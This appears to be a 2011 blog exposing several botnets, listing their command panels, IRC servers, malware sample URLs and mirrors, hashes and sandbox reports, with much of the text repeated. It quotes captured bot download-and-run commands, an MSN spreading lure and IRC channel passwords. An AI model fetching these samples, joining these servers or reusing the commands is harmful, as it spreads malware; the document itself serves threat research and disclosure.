Criminal's AIM Screen name: kenunloaded
Panel:
http://193.107.16.134/umbra/Panel/bot.php
http://193.107.16.134/umbra/Panel/
Virus Scan:
http://www.virustotal.com/file-scan/report.html?id=a47b0bd0d9bbd556bf21ada7f93f4018840b1d13357c4cc4a74e1b3a525dbd1b-1316067901
Analysis:
http://anubis.iseclab.org/?action=result&task_id=112aa04a16b3ba5d4b1afdf650ebd2f6f
http://www.threatexpert.com/report.aspx?md5=75e415e752846645ae89b9a4ea1180a6
Hosted with:
http://www.ideal-solution.org/
http://whois.domaintools.com/193.107.16.134
Bot(for further analysis):
http://www.mediafire.com/?xj1t1r7okqzjae7
http://www.multiupload.com/O65NGRDB9P
Exposed Botnets
Wednesday, September 14, 2011
Monday, September 12, 2011
BossesLoader + Gbot
(HTTP Side)BossesLoader:
http://3v.irc.su/CET/Panel/
http://3v.irc.su/CET/Panel/bot.php
Post data made from bot:
Bot responding to a command:
Process the bot runs as (Win7/Vista):
Now we get into the irc side of this criminals server.
(Irc Side)GBot:
Server: 94.23.252.85:4747 (channel: #Gbot)
Hosting Info:
http://whois.domaintools.com/94.23.252.85
(France Ovh Systems)
Virus Scan:
http://www.virustotal.com/file-scan/report.html?id=76d385c04e71cd4808059eebeb459c12fa092c405fac226eb0743ad6f44885c7-1315872197
Analysis:
http://www.threatexpert.com/report.aspx?md5=ea78961231a757f5a592948df290d5d2
http://anubis.iseclab.org/?action=result&task_id=1de6c531e3e513e94ddb15212a0be92d8
Connects to irc server: 94.23.252.85:4747
Irc Conversations:
Bot reuploaded (For any further analyses):
http://www.mediafire.com/?utnq797aqbp69b2
http://www.multiupload.com/89FOAW25BF
http://3v.irc.su/CET/Panel/
http://3v.irc.su/CET/Panel/bot.php
Post data made from bot:
mode=1
UID={0F798385-99F6-44B3-8628-0F7472F23D4F}
Bot responding to a command:
mode=2
UID={0F798385-99F6-44B3-8628-0F7472F23D4F}
version=0.2.0
Process the bot runs as (Win7/Vista):
C:\Users\\AppData\Local\wincsrss.exe
Now we get into the irc side of this criminals server.
(Irc Side)GBot:
Server: 94.23.252.85:4747 (channel: #Gbot)
Topic On: [ #Gbot ] [ !prot http://3v.irc.su/gbot.exe 1 ]
Topic By: [ Ted ]
Hosting Info:
http://whois.domaintools.com/94.23.252.85
(France Ovh Systems)
Virus Scan:
http://www.virustotal.com/file-scan/report.html?id=76d385c04e71cd4808059eebeb459c12fa092c405fac226eb0743ad6f44885c7-1315872197
Analysis:
http://www.threatexpert.com/report.aspx?md5=ea78961231a757f5a592948df290d5d2
http://anubis.iseclab.org/?action=result&task_id=1de6c531e3e513e94ddb15212a0be92d8
Connects to irc server: 94.23.252.85:4747
Irc Conversations:
NICK n{USA|XP}erafhjg
USER n{USA|XP}erafhjg 0 0 :n{USA|XP}erafhjg
JOIN #Gbot GTFO
afhjg 0 0 :n{USA|XP}erafhjg
PONG :7110E098
PRIVMSG #Gbot :[FileProt]: File protection has been enabled for C:\WINDOWS\system32\Dwdjqfihf.exe
Bot reuploaded (For any further analyses):
http://www.mediafire.com/?utnq797aqbp69b2
http://www.multiupload.com/89FOAW25BF
Zues hosted with Turkey Eskisehir National Academic Network And Information Center
http://193.255.81.157/cp.php
Hosting:
http://whois.domaintools.com/193.255.81.157
Hosted with: http://www.ulakbim.gov.tr/ (Possibly a hacked server)
Hosting:
http://whois.domaintools.com/193.255.81.157
Hosted with: http://www.ulakbim.gov.tr/ (Possibly a hacked server)
Zues hosted in Lithuania Siauliai Splius Uab
http://charityforcancer.info/donate/help/therapy/funds/thanks/cp.php
Registrar: GoDaddy.com Inc. (R171-LRMS)
Ip: 77.79.9.208
Hosting:
http://www.aleja.lt/
http://whois.domaintools.com/77.79.9.208
Bot:
http://charityforcancer.info/donate/help/therapy/funds/thanks/bot.exe
http://www.mediafire.com/?t42w7wbnh09r7ku
http://www.multiupload.com/MQ3D3TYBE0
Analysis:
http://www.threatexpert.com/report.aspx?md5=8da8384d5602a83b26683bb931769d60
http://anubis.iseclab.org/?action=result&task_id=14d3ea94794834874e582da5b36a31e41
Config:
http://charityforcancer.info/donate/help/therapy/funds/thanks/config.bin
http://www.mediafire.com/?pq0ji6a6c9edaf7
http://www.multiupload.com/785DXO2WZ0
Registrar: GoDaddy.com Inc. (R171-LRMS)
Ip: 77.79.9.208
Hosting:
http://www.aleja.lt/
http://whois.domaintools.com/77.79.9.208
Bot:
http://charityforcancer.info/donate/help/therapy/funds/thanks/bot.exe
http://www.mediafire.com/?t42w7wbnh09r7ku
http://www.multiupload.com/MQ3D3TYBE0
Analysis:
http://www.threatexpert.com/report.aspx?md5=8da8384d5602a83b26683bb931769d60
http://anubis.iseclab.org/?action=result&task_id=14d3ea94794834874e582da5b36a31e41
Config:
http://charityforcancer.info/donate/help/therapy/funds/thanks/config.bin
http://www.mediafire.com/?pq0ji6a6c9edaf7
http://www.multiupload.com/785DXO2WZ0
KCA's Botnet
BoTNeTRooT@hotmail.com
Goes under the alias KCA
SohbetCeLL.Net
Server: tr.byinter.net (149.3.130.4)
Main Channel: #BoTiSTaN
Bots:
Unknown Irc Bots:
http://www.sohbetcell.net/KCA.exe
http://www.sohbetcell.net/bot.exe (Possibly TsGh Bot)
http://www.sohbetcell.net/images.exe
RageBot/Agobot:
http://www.sohbetcell.net/vnc.exe
DorkBot/NgrBot Varients:
http://www.sohbetcell.net/bg.exe
http://www.sohbetcell.net/enes.exe
Other bots used:
The irc also uses Aryan bot, I was unable to acquire an .exe at the time of this analysis.
Mirror (in case he removes the bots from his site):
http://www.mediafire.com/download.php?7tyho4d186y0y9s
http://www.multiupload.com/USXT6VA2XB
KCA.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315763939
http://www.threatexpert.com/report.aspx?...5e686ac6db
http://anubis.iseclab.org/?action=result...d14e07eca2
Md5: e4e34ef3c4609a89bfc0b95e686ac6db
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:
Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: "www.metalteam.oRg"
bot.exe (IRC Bot) (Possibly variant of TsGh bot)
http://www.virustotal.com/file-scan/repo...1315765287
http://www.threatexpert.com/report.aspx?...979195befc
http://anubis.iseclab.org/?action=result...d056960105
Md5: 1978e6758d4ab41f392457979195befc
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:
Nick: KCA[iRooT-XP-AUT]039489
Username: 6044
Joined Channel: #botnet with Password KCA
Private Message to Channel #botistan: "#dl http://www.sohbetcell.net/bg.exe 1"
images.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315764816
http://www.threatexpert.com/report.aspx?...fa65617b49
http://anubis.iseclab.org/?action=result...91fcc18a9d
Md5: 01985cc5f38d8a719da83efa65617b49
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:
Nick: [9355|AUT|XP|KCA]
Username: 9355
Server Pass: KCA
Joined Channel: #KCA with Password KCA
vnc.exe (Rage Bot/Agobot)
http://www.virustotal.com/file-scan/repo...1315764819
http://www.threatexpert.com/report.aspx?...721c444cd3
http://anubis.iseclab.org/?action=result...f96c16f376
Md5: 23c849b73f74236f15159b721c444cd3
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:
Nick: X{KCA|VNC}60389
Username: ummkj
Joined Channel: #vnc with Password KCA
bg.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315764588
http://www.threatexpert.com/report.aspx?...08eb6ca464
http://anubis.iseclab.org/?action=result...b89bf83d87
Md5: ba93b01ff4a0e63f9b35d808eb6ca464
Irc Connection: 149.3.130.4:6667
IRC Conversations:
NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to "This is in the image that you? http://www.sohbetcell.net/images.php?id="
enes.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315767195
http://www.threatexpert.com/report.aspx?...cb225a2b3b
http://anubis.iseclab.org/?action=result...f3794cdfa5
Md5: 95552ba9c7530c3cd25f7bcb225a2b3b
Goes under the alias KCA
SohbetCeLL.Net
Server: tr.byinter.net (149.3.130.4)
Main Channel: #BoTiSTaN
Bots:
Unknown Irc Bots:
http://www.sohbetcell.net/KCA.exe
http://www.sohbetcell.net/bot.exe (Possibly TsGh Bot)
http://www.sohbetcell.net/images.exe
RageBot/Agobot:
http://www.sohbetcell.net/vnc.exe
DorkBot/NgrBot Varients:
http://www.sohbetcell.net/bg.exe
http://www.sohbetcell.net/enes.exe
Other bots used:
The irc also uses Aryan bot, I was unable to acquire an .exe at the time of this analysis.
Mirror (in case he removes the bots from his site):
http://www.mediafire.com/download.php?7tyho4d186y0y9s
http://www.multiupload.com/USXT6VA2XB
KCA.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315763939
http://www.threatexpert.com/report.aspx?...5e686ac6db
http://anubis.iseclab.org/?action=result...d14e07eca2
Md5: e4e34ef3c4609a89bfc0b95e686ac6db
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:
Nick: KCA{AUT-XP}992432
Username: 9924
Server Pass: KCA
Joined Channel: #KCA with Password KCAt
Private Message to Channel #KCA: "www.metalteam.oRg"
bot.exe (IRC Bot) (Possibly variant of TsGh bot)
http://www.virustotal.com/file-scan/repo...1315765287
http://www.threatexpert.com/report.aspx?...979195befc
http://anubis.iseclab.org/?action=result...d056960105
Md5: 1978e6758d4ab41f392457979195befc
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:
Nick: KCA[iRooT-XP-AUT]039489
Username: 6044
Joined Channel: #botnet with Password KCA
Private Message to Channel #botistan: "#dl http://www.sohbetcell.net/bg.exe 1"
images.exe (IRC Bot)
http://www.virustotal.com/file-scan/repo...1315764816
http://www.threatexpert.com/report.aspx?...fa65617b49
http://anubis.iseclab.org/?action=result...91fcc18a9d
Md5: 01985cc5f38d8a719da83efa65617b49
DNS Queries: tr.byinter.net (149.3.130.4) (Was 178.162.244.239 when that analysis took place)
IRC Conversations:
Nick: [9355|AUT|XP|KCA]
Username: 9355
Server Pass: KCA
Joined Channel: #KCA with Password KCA
vnc.exe (Rage Bot/Agobot)
http://www.virustotal.com/file-scan/repo...1315764819
http://www.threatexpert.com/report.aspx?...721c444cd3
http://anubis.iseclab.org/?action=result...f96c16f376
Md5: 23c849b73f74236f15159b721c444cd3
DNS Queries: tr.byinter.net (149.3.130.4)
IRC Conversations:
Nick: X{KCA|VNC}60389
Username: ummkj
Joined Channel: #vnc with Password KCA
bg.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315764588
http://www.threatexpert.com/report.aspx?...08eb6ca464
http://anubis.iseclab.org/?action=result...b89bf83d87
Md5: ba93b01ff4a0e63f9b35d808eb6ca464
Irc Connection: 149.3.130.4:6667
IRC Conversations:
NICK n{US|XPa}brjxndz
USER brjxndz 0 0 :brjxndz
JOIN #BETA KCA
PRIVMSG #beta :[MSN]: Updated MSN spread message to "This is in the image that you? http://www.sohbetcell.net/images.php?id="
enes.exe (Variant of Dorkbot/Ngrbot)
http://www.virustotal.com/file-scan/repo...1315767195
http://www.threatexpert.com/report.aspx?...cb225a2b3b
http://anubis.iseclab.org/?action=result...f3794cdfa5
Md5: 95552ba9c7530c3cd25f7bcb225a2b3b
Subscribe to:
Posts (Atom)